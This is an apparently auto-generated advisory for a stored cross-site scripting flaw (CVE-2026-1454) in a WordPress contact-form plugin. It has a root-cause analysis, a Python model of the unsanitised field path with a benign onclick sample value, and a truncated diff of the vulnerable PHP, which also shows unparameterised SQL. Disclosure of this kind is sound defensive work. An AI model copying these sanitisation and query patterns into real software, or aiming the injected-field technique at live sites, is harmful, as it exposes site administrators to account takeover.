Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1454: Responsive Contact Form Builder & Lead Generation Plugin <= 2.0.1 – Unauthenticated Stored Cross-Site Scripting (lead-form-builder)

CVE ID: CVE-2026-1454
Severity: High (CVSS 7.2)
CWE: 79
Vulnerable Version: 2.0.1
Patched Version: 2.0.3
Disclosed: March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1454:

The vulnerability exists in the Responsive Contact Form Builder & Lead Generation Plugin for WordPress versions up to and including 2.0.1. The root cause is insufficient input sanitization in the lfb_lead_sanitize() function combined with overly permissive output filtering via wp_kses(). The lfb_lead_sanitize() function uses a whitelist approach that only sanitizes specific field types (name, text, radio, option, email, number, message, textarea, date, dob, url, checkbox). Field types not matching these patterns bypass sanitization entirely.

The vulnerability manifests in the lfb_Save_Form_Data() function, which processes form submissions via the Save_Form_Data AJAX action. Attackers can submit malicious payloads through unlisted field types that persist in the database. The stored XSS triggers when administrators view lead entries in the WordPress dashboard. The plugin renders lead data using wp_kses() with the expanded_alowed_tags() method from the LFB_Show_Leads class. This method permits onclick attributes on anchor tags, enabling JavaScript execution.

The patch adds comprehensive sanitization for all field types by removing the restrictive whitelist. It introduces a new lfb_lead_sanitize_all() function that applies sanitize_text_field() to any value not explicitly handled by existing type-specific sanitizers. The patch also removes the onclick attribute from the expanded_alowed_tags() output filter.

Exploitation requires unauthenticated access to the frontend form submission endpoint. Attackers inject malicious JavaScript via form fields that bypass the original sanitization logic. The payload executes in the administrator's context when viewing leads, potentially leading to site takeover.
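The two halves of the bug described above, the input-side whitelist gap and the output-side onclick allowance, are easier to reason about side by side. The Python below is an added illustration written for this page, not plugin code and not WordPress code: it re-creates the shape of lfb_lead_sanitize() (key normalised with the same regex, the same list of handled types, everything else passed through raw), the patched catch-all that sanitises unhandled values as text, and a deliberately small stand-in for wp_kses() with and without onclick in the allowed attributes. The approx_* functions, kses_like(), the ALLOWED_* tables, flag_suspicious_values() and the sample submission are all assumptions of this example; the real WordPress sanitisers and wp_kses() are considerably more thorough.

```python
"""Model of the CVE-2026-1454 sanitisation gap (added example, not plugin code).

Rough stand-ins for sanitize_text_field(), sanitize_textarea_field() and
wp_kses() are used so the file runs offline; they are approximations only.
"""
import re

# Field types the vulnerable lfb_lead_sanitize() handled, per the diff.
TEXT_TYPES = {"name", "text", "radio", "option", "date", "dob"}
AREA_TYPES = {"message", "textarea"}


def normalize_key(key: str) -> str:
    """Mirror preg_replace("/[^a-zA-Z]+/", "", $key): 'text_3' -> 'text'."""
    return re.sub(r"[^a-zA-Z]+", "", key)


def approx_sanitize_text_field(value: str) -> str:
    """Approximation of sanitize_text_field(): strip tags, collapse whitespace."""
    return re.sub(r"\s+", " ", re.sub(r"<[^>]*>", "", value)).strip()


def approx_sanitize_textarea_field(value: str) -> str:
    """Approximation of sanitize_textarea_field(): strip tags, keep newlines."""
    return re.sub(r"<[^>]*>", "", value).strip()


def _sanitize_known(rkey: str, value):
    """Type-specific branches shared by both versions; None means 'unhandled'."""
    if rkey in TEXT_TYPES:
        return approx_sanitize_text_field(value)
    if rkey == "email":
        return value if re.fullmatch(r"[^@\s<>]+@[^@\s<>]+\.[^@\s<>]+", value) else ""
    if rkey == "number":
        m = re.match(r"[-+]?\d+", value.strip())
        return int(m.group()) if m else 0
    if rkey in AREA_TYPES:
        return approx_sanitize_textarea_field(value)
    if rkey == "url":
        return value if re.match(r"https?://", value) else ""
    if rkey == "checkbox":
        return [approx_sanitize_text_field(v) for v in value]
    return None


def lead_sanitize_vulnerable(leads: dict) -> dict:
    """<= 2.0.1 behaviour: an unlisted field type keeps its raw value."""
    out = {}
    for key, value in leads.items():
        clean = _sanitize_known(normalize_key(key), value)
        out[key] = value if clean is None else clean  # raw pass-through
    return out


def lead_sanitize_patched(leads: dict) -> dict:
    """Patched behaviour (lfb_lead_sanitize_all): unhandled values become plain text."""
    out = {}
    for key, value in leads.items():
        clean = _sanitize_known(normalize_key(key), value)
        if clean is None:
            clean = ([approx_sanitize_text_field(v) for v in value]
                     if isinstance(value, list) else approx_sanitize_text_field(value))
        out[key] = clean
    return out


# Output side: allowed tags/attributes as the lead table uses them (constructed).
ALLOWED_VULNERABLE = {
    "a": {"href", "title", "class", "onclick"}, "b": set(), "i": {"class", "aria-hidden"},
    "table": set(), "tr": set(), "th": set(), "td": set(), "div": {"id", "class"},
    "span": {"class"},
}
ALLOWED_PATCHED = {tag: attrs - {"onclick"} for tag, attrs in ALLOWED_VULNERABLE.items()}

_TAG = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)([^>]*)>")
_ATTR = re.compile(r"([A-Za-z][\w-]*)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")


def kses_like(html: str, allowed: dict) -> str:
    """Stand-in for wp_kses(): drop disallowed tags, keep only allowed attributes."""
    def fix(m: re.Match) -> str:
        closing, tag, attrs = m.group(1), m.group(2).lower(), m.group(3)
        if tag not in allowed:
            return ""
        if closing:
            return f"</{tag}>"
        kept = [f"{n}={v}" for n, v in _ATTR.findall(attrs) if n.lower() in allowed[tag]]
        return "<" + " ".join([tag] + kept) + ">"
    return _TAG.sub(fix, html)


EVENT_ATTR = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def flag_suspicious_values(lead: dict) -> list:
    """Defender check: names of stored fields whose value carries an HTML event handler."""
    return sorted(k for k, v in lead.items() if isinstance(v, str) and EVENT_ATTR.search(v))


# Constructed sample submission, shaped like the wp_parse_str()'d form post.
SUBMISSION = {
    "name_1": "Alice <b>Smith</b>",
    "email_2": "alice@example.com",
    "select_3": '<a href="#" onclick="doSomething()">Option A</a>',  # unlisted type
}

if __name__ == "__main__":
    vuln, fixed = lead_sanitize_vulnerable(SUBMISSION), lead_sanitize_patched(SUBMISSION)
    print("stored (vulnerable):", vuln, "flagged:", flag_suspicious_values(vuln))
    print("stored (patched):   ", fixed, "flagged:", flag_suspicious_values(fixed))
    print("rendered, onclick allowed:", kses_like("<td>" + vuln["select_3"] + "</td>", ALLOWED_VULNERABLE))
    print("rendered, onclick removed:", kses_like("<td>" + vuln["select_3"] + "</td>", ALLOWED_PATCHED))
```

The select_3 key normalises to "select", which is in neither list, so the vulnerable version stores the markup untouched and the permissive allow-list then renders it with the handler intact; either half of the patch on its own breaks the chain. flag_suspicious_values() is the kind of check worth running over already-stored leads after upgrading, since the patch changes how new submissions are sanitised but does not rewrite rows saved earlier.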

Differential between vulnerable and patched code

Code Diff
--- a/lead-form-builder/inc/ajax-functions.php
+++ b/lead-form-builder/inc/ajax-functions.php
@@ -1,742 +1,767 @@
-<?php
-if (!defined('ABSPATH')) exit; // Exit if accessed directly
-
-
-
-/*
- * Save Lead collecting method
- */
-function lfb_save_lead_settings()
-{
-    $nonce = $_REQUEST['lrv_nonce_verify'];
-    // Get all the user roles as an array.
-    if (isset($_POST['action-lead-setting'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lrv-nonce')) {
-
-    $data_recieve_method = intval($_POST['data-recieve-method']);
-    $this_form_id = intval($_POST['action-lead-setting']);
-    global $wpdb;
-    $table_name = LFB_FORM_FIELD_TBL;
-    $update_query = "update " . LFB_FORM_FIELD_TBL . " set storeType='" . $data_recieve_method . "' where id='" . $this_form_id . "'";
-    $th_save_db = new LFB_SAVE_DB($wpdb);
-    $update_leads = $th_save_db->lfb_update_form_data($update_query);
-    if ($update_leads) {
-        esc_html_e('updated', 'lead-form-builder');
-    }
-
-    die();
-
-}
-}
-
-add_action('wp_ajax_SaveLeadSettings', 'lfb_save_lead_settings');
-
-/*
- * Save Email Settings
- */
-
-function lfb_save_email_settings()
-{
-
-    $nonce = $_REQUEST['aes_nonce'];
-    // Get all the user roles as an array.
-    if (isset($_POST['email_setting']['form-id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'aes-nonce')) {
-
-    global $wpdb;
-    $email_setting = array();
-    $this_form_id = intval($_POST['email_setting']['form-id']);
-    $email_setting['email_setting'] = isset($_POST['email_setting']) ? $_POST['email_setting'] : '';
-    $serialize = maybe_serialize($email_setting);
-    $table_name = LFB_FORM_FIELD_TBL;
-    $update_query = "update " . LFB_FORM_FIELD_TBL . " set mail_setting='" . $serialize . "' where id='" . $this_form_id . "'";
-    $th_save_db = new LFB_SAVE_DB($wpdb);
-    $update_leads = $th_save_db->lfb_update_form_data($update_query);
-    if ($update_leads) {
-        esc_html_e('updated', 'lead-form-builder');
-    }
-    die();
-    }
-}
-
-add_action('wp_ajax_SaveEmailSettings', 'lfb_save_email_settings');
-
-/*
- * Save captcha Keys
- */
-
-function lfb_save_captcha_settings()
-{
-    $nonce = $_POST['captcha_nonce'];
-
-    if (isset($_POST['captcha-keys'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
-
-    $captcha_setting_sitekey = sanitize_text_field($_POST['captcha-setting-sitekey']);
-    $captcha_setting_secret = sanitize_text_field($_POST['captcha-setting-secret']);
-
-    if (get_option('captcha-setting-sitekey') !== false) {
-        update_option('captcha-setting-sitekey', $captcha_setting_sitekey);
-        update_option('captcha-setting-secret', $captcha_setting_secret);
-    } else {
-        add_option('captcha-setting-sitekey', $captcha_setting_sitekey);
-        add_option('captcha-setting-secret', $captcha_setting_secret);
-    }
-}
-    die();
-}
-
-add_action('wp_ajax_SaveCaptchaSettings', 'lfb_save_captcha_settings');
-
-/*
- * Delete Leads From Back-end
- */
-function lfb_delete_leads_backend()
-{
-
-    $nonce = $_REQUEST['_lfbnonce'];
-    // Get all the user roles as an array.
-
-    $check = false;
-    if (isset($_POST['lead_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lfb-nonce-rm')) {
-        $check = true;
-
-        $this_lead_id = intval($_POST['lead_id']);
-        global $wpdb;
-        $table_name = LFB_FORM_DATA_TBL;
-
-        $update_query = $wpdb->prepare(" DELETE FROM $table_name WHERE id = %d ", $this_lead_id);
-
-        $th_save_db = new LFB_SAVE_DB($wpdb);
-        $update_leads = $th_save_db->lfb_delete_form($update_query);
-        echo esc_html($update_leads);
-    }
-
-    echo $check;
-}
-
-add_action('wp_ajax_delete_leads_backend', 'lfb_delete_leads_backend');
-
-/*
- * Save captcha status for form ON/OFF
- */
-
-function lfb_save_captcha_option()
-{
-    $nonce = $_POST['captcha_nonce'];
-if (isset($_POST['captcha_on_off_form_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
-
-    $captcha_option = sanitize_text_field($_POST['captcha-on-off-setting']);
-    $this_form_id = intval($_POST['captcha_on_off_form_id']);
-    global $wpdb;
-    $table_name = LFB_FORM_FIELD_TBL;
-    $update_query = "update " . LFB_FORM_FIELD_TBL . " set captcha_status='" . $captcha_option . "' where id='" . $this_form_id . "'";
-    $th_save_db = new LFB_SAVE_DB($wpdb);
-    $update_leads = $th_save_db->lfb_update_form_data($update_query);
-    if ($update_leads) {
-        esc_html_e('updated', 'lead-form-builder');
-    }
-}
-    die();
-}
-
-add_action('wp_ajax_SaveCaptchaOption', 'lfb_save_captcha_option');
-
-/*
- * Show all Leads column on Lead Page Based on form selection
- */
-
-function lfb_ShowAllLeadThisForm()
-{
-    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
-
-        global $wpdb;
-        $table_name = LFB_FORM_DATA_TBL;
-        $th_save_db = new LFB_SAVE_DB($wpdb);
-        $nonce = wp_create_nonce('lfb-nonce-rm');
-        $showLeadsObj = new LFB_Show_Leads();
-        $start = 0;
-        $limit = 10;
-        $detail_view  = '';
-        $slectleads = false;
-
-        if (isset($_GET['id'])) {
-            $id = intval($_GET['id']);
-            $start = ($id - 1) * $limit;
-            $form_id = intval($_GET['form_id']);
-            $sn_counter = $start;
-        } else {
-            $id = 1;
-            $form_id = intval($_POST['form_id']);
-            $sn_counter = 0;
-        }
-        if (isset($_GET['detailview'])) {
-            $detail_view = sanitize_text_field($_GET['detailview']);
-        }
-
-        if (isset($_POST['slectleads'])) {
-            $slectleads = sanitize_text_field($_POST['slectleads']);
-        }
-
-        $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
-        $posts          = $getArray['posts'];
-        $rows           = $getArray['rows'];
-        $limit          = $getArray['limit'];
-        $fieldData       = $getArray['fieldId'];
-        $tableHead  = '';
-        $headcount = 1;
-        $leadscount = 5;
-
-        foreach ($fieldData as $fieldkey => $fieldvalue) {
-            // Html Field removed
-            $pos = strpos($fieldkey, 'htmlfield_');
-            if ($pos !== false) {
-                continue;
-            }
-
-            if ($headcount < 6 && $slectleads) {
-                $tableHead  .= '<th>' . $fieldvalue . '</th>';
-            } elseif (!$slectleads) {
-
-                $tableHead  .= '<th>' . $fieldvalue . '</th>';
-
-                $leadscount =  $headcount;
-            }
-            $fieldIdNew[] = $fieldkey;
-            $headcount++;
-
-            // } else{ break; }
-        }
-
-        if (!empty($posts)) {
-            $entry_counter = 0;
-            $table_body = '';
-            $table_head = '';
-            $popupTab   = '';
-
-            if ($headcount >= 6 && $leadscount == 5) {
-                $table_head .= '<th></th><th> . . . </th><th><input type="button" onclick="show_all_leads(' . intval($id) . ',' . intval($form_id) . ')" value="Show all Columns"></th>';
-            }
-
-            foreach ($posts as $results) {
-                $table_row = '';
-                // $table_head = '';
-                $sn_counter++;
-                $row_size_limit = 0;
-                $form_data = $results->form_data;
-                $lead_id = $results->id;
-                $lead_date = date("jS F Y", strtotime($results->date));
-                $form_data = maybe_unserialize($form_data);
-                unset($form_data['hidden_field']);
-                unset($form_data['action']);
-                $entry_counter++;
-                $complete_data = '';
-                $popup_data_val = '';
-                $date_td = '<td><b>' . $lead_date . '</b></td>';
-
-
-                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, $leadscount);
-                $table_row .= $returnData['table_row'];
-                $table_row .= $date_td;
-
-                foreach ($form_data as $form_data_key => $form_data_value) {
-                    $row_size_limit++;
-
-                    if (($detail_view != 1) && ($row_size_limit == 6) && $leadscount == 5) {
-                        $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
-                    }
-                }
-
-                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
-                /****/
-                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
-                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
-                          </div>
-                          </div>';
-
-                //  $complete_data .=$returnData['table_popup']."</table>";
-
-                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
-                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
-            }
-
-            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . '<th>Date</th>' . $table_head . '</tr></thead>';
-
-            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
-            $total = ceil($rows / $limit);
-            if ($headcount >= 6 && $leadscount == 5) {
-
-                if ($id > 1) {
-                    echo "<a href=''  onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
-                }
-                if ($id != $total) {
-                    echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
-                }
-                echo "<ul class='page'>";
-                for ($i = 1; $i <= $total; $i++) {
-                    if ($i == $id) {
-                        echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
-                    } else {
-                        echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
-                    }
-                }
-                echo '</ul>';
-            } else {
-
-                if ($id > 1) {
-                    echo "<a href=''  onclick='lead_pagination(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
-                }
-                if ($id != $total) {
-                    echo "<a href='' onclick='lead_pagination(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
-                }
-                echo "<ul class='page'>";
-                for ($i = 1; $i <= $total; $i++) {
-                    if ($i == $id) {
-                        echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
-                    } else {
-                        echo "<li><a href='' onclick='lead_pagination(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
-                    }
-                }
-                echo '</ul>';
-            }
-        } else {
-            esc_html_e('Opps No lead...!!', 'lead-form-builder');
-        }
-        die();
-    }
-}
-
-add_action('wp_ajax_ShowAllLeadThisForm', 'lfb_ShowAllLeadThisForm');
-
-
-
-function lfb_ShowLeadPagi()
-{
-    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
-        global $wpdb;
-        $table_name = LFB_FORM_DATA_TBL;
-        $th_save_db = new LFB_SAVE_DB($wpdb);
-        $showLeadsObj = new LFB_Show_Leads();
-        $nonce = wp_create_nonce('lfb-nonce-rm');
-        $start = 0;
-        $limit = 10;
-        $detail_view = '';
-
-        if (isset($_GET['id'])) {
-            $id = intval($_GET['id']);
-            $start = ($id - 1) * $limit;
-            $form_id = intval($_GET['form_id']);
-            $sn_counter = $start;
-        } else {
-            $id = 1;
-            $form_id = intval($_POST['form_id']);
-            $sn_counter = 0;
-        }
-        if (isset($_GET['detailview'])) {
-            $detail_view = isset($_GET['detailview']);
-        }
-
-        $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
-        $posts          = $getArray['posts'];
-        $rows           = $getArray['rows'];
-        $limit          = $getArray['limit'];
-        $fieldData       = $getArray['fieldId'];
-        $tableHead  = '';
-        $headcount = 1;
-
-        foreach ($fieldData as $fieldkey => $fieldvalue) {
-            if ($headcount < 6) {
-                $tableHead  .= '<th>' . $fieldvalue . '</th>';
-            }
-            $fieldIdNew[] = $fieldkey;
-            // } else{ break; }
-            $headcount++;
-        }
-        if (!empty($posts)) {
-            $entry_counter = 0;
-            $table_body = '';
-            $table_head = '';
-            $popupTab   = '';
-
-            if ($headcount >= 6) {
-                $table_head .= '<th> . . . </th><th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all Columns"></th>';
-            }
-
-            foreach ($posts as $results) {
-                $table_row = '';
-                $sn_counter++;
-                $row_size_limit = 0;
-                $form_data = $results->form_data;
-                $lead_id = $results->id;
-                $form_data = maybe_unserialize($form_data);
-                unset($form_data['hidden_field']);
-                unset($form_data['action']);
-                $entry_counter++;
-                $complete_data = '';
-                $popup_data_val = '';
-
-                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
-                $table_row .= $returnData['table_row'];
-
-                foreach ($form_data as $form_data_key => $form_data_value) {
-                    $row_size_limit++;
-
-                    if (($detail_view != 1) && ($row_size_limit == 6)) {
-                        $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
-                    }
-                }
-
-                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
-                /****/
-                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
-                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
-                          </div>
-                          </div>';
-                /****/
-                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
-                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
-            }
-
-            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
-
-            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
-            $total = ceil($rows / $limit);
-            if ($id > 1) {
-                echo "<a href=''  onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
-            }
-            if ($id != $total) {
-                echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
-            }
-            echo "<ul class='page'>";
-            for ($i = 1; $i <= $total; $i++) {
-                if ($i == $id) {
-                    echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
-                } else {
-                    echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
-                }
-            }
-            echo '</ul>';
-        } else {
-            esc_html_e('Opps No lead...!!', 'lead-form-builder');
-        }
-        die();
-    }
-}
-add_action('wp_ajax_ShowLeadPagi', 'lfb_ShowLeadPagi');
-
-/*
- * Show Leads on Lead Page Based on form selection
- */
-
-function lfb_ShowAllLeadThisFormDate()
-{
-    if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
-        global $wpdb;
-        $nonce = wp_create_nonce('lfb-nonce-rm');
-        $table_name = LFB_FORM_DATA_TBL;
-        $th_save_db = new LFB_SAVE_DB($wpdb);
-        $showLeadsObj = new LFB_Show_Leads();
-        $start = 0;
-        $limit = 10;
-        $detail_view = '';
-
-        if (isset($_GET['id'])) {
-            $id = intval($_GET['id']);
-            $datewise = sanitize_text_field($_GET['datewise']);
-            $start = ($id - 1) * $limit;
-            $form_id = intval($_GET['form_id']);
-            $sn_counter = $start;
-        } else {
-            $id = 1;
-            $datewise = '';
-            $sn_counter = 0;
-        }
-        if (isset($_GET['detailview'])) {
-            $detail_view = sanitize_text_field($_GET['detailview']);
-        }
-        $getArray =  $th_save_db->lfb_get_all_view_date_leads_db($form_id, $datewise, $start);
-
-        $posts          = $getArray['posts'];
-        $rows           = $getArray['rows'];
-        $limit          = $getArray['limit'];
-        $fieldData       = $getArray['fieldId'];
-        $fieldIdNew     = array();
-        $headcount = 1;
-
-        $tableHead  = '';
-
-
-        foreach ($fieldData as $fieldkey => $fieldvalue) {
-            if ($headcount < 6) {
-                $tableHead  .= '<th>' . $fieldvalue . '</th>';
-            }
-            $fieldIdNew[] = $fieldkey;
-            // } else{ break; }
-            $headcount++;
-        }
-
-        if (!empty($posts)) {
-            $entry_counter = 0;
-            $value1 = 0;
-            $table_body = '';
-            $table_head = '';
-            $popupTab   = '';
-
-
-            if ($headcount >= 6) {
-                $table_head .= '<th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all fields"></th>';
-            }
-
-            foreach ($posts as $results) {
-                $table_row = '';
-                $sn_counter++;
-                $row_size_limit = 0;
-                $form_data = $results->form_data;
-                $lead_id = $results->id;
-                $form_data = maybe_unserialize($form_data);
-                unset($form_data['hidden_field']);
-                unset($form_data['action']);
-                $entry_counter++;
-                $complete_data = '';
-                $popup_data_val = '';
-
-                $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
-                $table_row .= $returnData['table_row'];
-
-
-
-                foreach ($form_data as $form_data_key => $form_data_value) {
-                    $row_size_limit++;
-
-                    if (($detail_view != 1) && ($row_size_limit == 6)) {
-                        $table_row .= '<td>. . . . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
-                    }
-                }
-
-                $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
-                /****/
-                $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
-                          <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
-                          </div>
-                          </div>';
-                /****/
-                $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
-                $table_body  .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
-            }
-
-            $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
-
-            echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
-            $rows = count($rows);
-            $total = ceil($rows / $limit);
-            if ($id > 1) {
-                echo "<a href=''  onclick='lead_pagination_datewise(" . intval($id - 1) . "," . intval($form_id) . ","" . $datewise . "");' class='button'><i class='fa fa-chevron-right'></i></a>";
-            }
-            if ($id != $total) {
-                echo "<a href='' onclick='lead_pagination_datewise(" . intval($id + 1) . "," . intval($form_id) . ","" . $datewise . "");' class='button'><i class='fa fa-chevron-left'></i></a>";
-            }
-            echo "<ul class='page'>";
-            for ($i = 1; $i <= $total; $i++) {
-                if ($i == $id) {
-                    echo "<li class='lf-current'><a>" . intval($i) . "</a></li>";
-                } else {
-                    echo "<li><a href='' onclick='lead_pagination_datewise(" . intval($i) . "," . intval($form_id) . ","" . $datewise . "");'>" . intval($i) . "</a></li>";
-                }
-            }
-            echo '</ul>';
-        } else {
-            esc_html_e('Opps No lead...!!', 'lead-form-builder');
-        }
-        die();
-    }
-}
-add_action('wp_ajax_ShowAllLeadThisFormDate', 'lfb_ShowAllLeadThisFormDate');
-
-/*
- * Save from Data from front-end
- */
-
-function lfb_form_name_email_filter($form_data)
-{
-    $name_email = array();
-    $e = false;
-    $n = false;
-    foreach ($form_data as $key => $value) {
-        $email = strpos($key, 'email_');
-        $name = strpos($key, 'name_');
-        if ($email !== false) {
-            $name_email['email'] = $value;
-            $e = true;
-        } elseif ($name !== false) {
-            $name_email['name'] = $value;
-            $n = true;
-        }
-        if ($e === true && $n === true) {
-            break;
-        }
-    }
-    return $name_email;
-}
-
-function lfb_lead_sanitize($leads)
-{
-    if (is_array($leads)) {
-        foreach ($leads as $key => $value) {
-            $rKey = preg_replace("/[^a-zA-Z]+/", "", $key);
-            if ($rKey === 'name' || $rKey === 'text' || $rKey === 'radio' || $rKey === 'option') {
-                $leads[$key] = sanitize_text_field($value);
-            } elseif ($rKey === 'email') {
-                $leads[$key] = sanitize_email($value);
-            } elseif ($rKey === 'number') {
-                $leads[$key] = intval($value);
-            } elseif ($rKey === 'message' || $rKey === 'textarea') {
-                $leads[$key] = sanitize_textarea_field($value);
-            } elseif ($rKey === 'date' || $rKey === 'dob') {
-                $leads[$key] = sanitize_text_field($value);
-            } elseif ($rKey === 'url') {
-                $leads[$key] = esc_url_raw($value);
-            } elseif ($rKey === 'checkbox') {
-
-                foreach ($value as $ckey => $cvalue) {
-                    $value[$ckey] = sanitize_text_field($cvalue);
-                }
-                $leads[$key] = $value;
-            }
-        } // end foreach
-
-        return $leads;
-    }
-}
-
-function lfb_Save_Form_Data()
-{
-
-    if (isset($_POST['fdata']) && wp_verify_nonce($_POST['_wpnonce'], 'lfb_front_nonce' )) {
-        wp_parse_str($_POST['fdata'], $fromData);
-
-        $form_id = intval($fromData['hidden_field']);
-        unset($fromData['g-recaptcha-response']);
-        unset($fromData['action']);
-        unset($fromData['hidden_field']);
-
-        $en = lfb_form_name_email_filter($fromData);
-
-
-        if ((isset($en['email'])) && ($en['email'] != '')) {
-            $user_emailid = sanitize_email($en['email']);
-        } else {
-            $user_emailid = esc_html__('invalid_email', 'lead-form-builder');
-        }
-        $sanitize_leads =  lfb_lead_sanitize($fromData);
-        $form_data = maybe_serialize($sanitize_leads);
-
-        $lf_store   = new LFB_LeadStoreType();
-        $th_save_db = new LFB_SAVE_DB();
-
-        $lf_store->lfb_mail_type($form_id, $form_data, $th_save_db, $user_emailid);
-    }else{
-        echo esc_html__('INVAILD','lead-form-builder');
-    }
-    die();
-}
-
-add_action('wp_ajax_Save_Form_Data', 'lfb_Save_Form_Data');
-add_action('wp_ajax_nopriv_Save_Form_Data', 'lfb_Save_Form_Data');
-
-function lfb_verifyFormCaptcha()
-{
-    if ((isset($_POST['captcha_res'])) && (!empty($_POST['captcha_res']))) {
-        $captcha = stripslashes($_POST['captcha_res']);
-        $secret_key = get_option('captcha-setting-secret');
-        $response = wp_remote_post(
-            'https://www.google.com/recaptcha/api/siteverify',
-            array(
-                'method' => 'POST',
-                'body' => array(
-                    'secret' => $secret_key,
-                    'response' => $captcha
-                )
-            )
-        );
-        $reply_obj = json_decode(wp_remote_retrieve_body($response));
-        if (isset($reply_obj->success) && $reply_obj->success == 1) {
-            esc_html_e('Yes', 'lead-form-builder');
-        } else {
-            esc_html_e('No', 'lead-form-builder');
-        }
-    } else {
-        esc_html_e('Invalid', 'lead-form-builder');
-    }
-    die();
-}
-add_action('wp_ajax_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
-add_action('wp_ajax_nopriv_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
-
-function lfb_RememberMeThisForm()
-{
-    $nonce = $_POST['rem_nonce'];
-
-    if (isset($_POST['form_id'])  && current_user_can('manage_options') && wp_verify_nonce($nonce, 'rem-nonce')) {
-
-        $remember_me = intval($_POST['form_id']);
-        if (get_option('lf-remember-me-show-lead') !== false) {
-            update_option('lf-remember-me-show-lead', $remember_me);
-        } else {
-            add_option('lf-remember-me-show-lead', $remember_me);
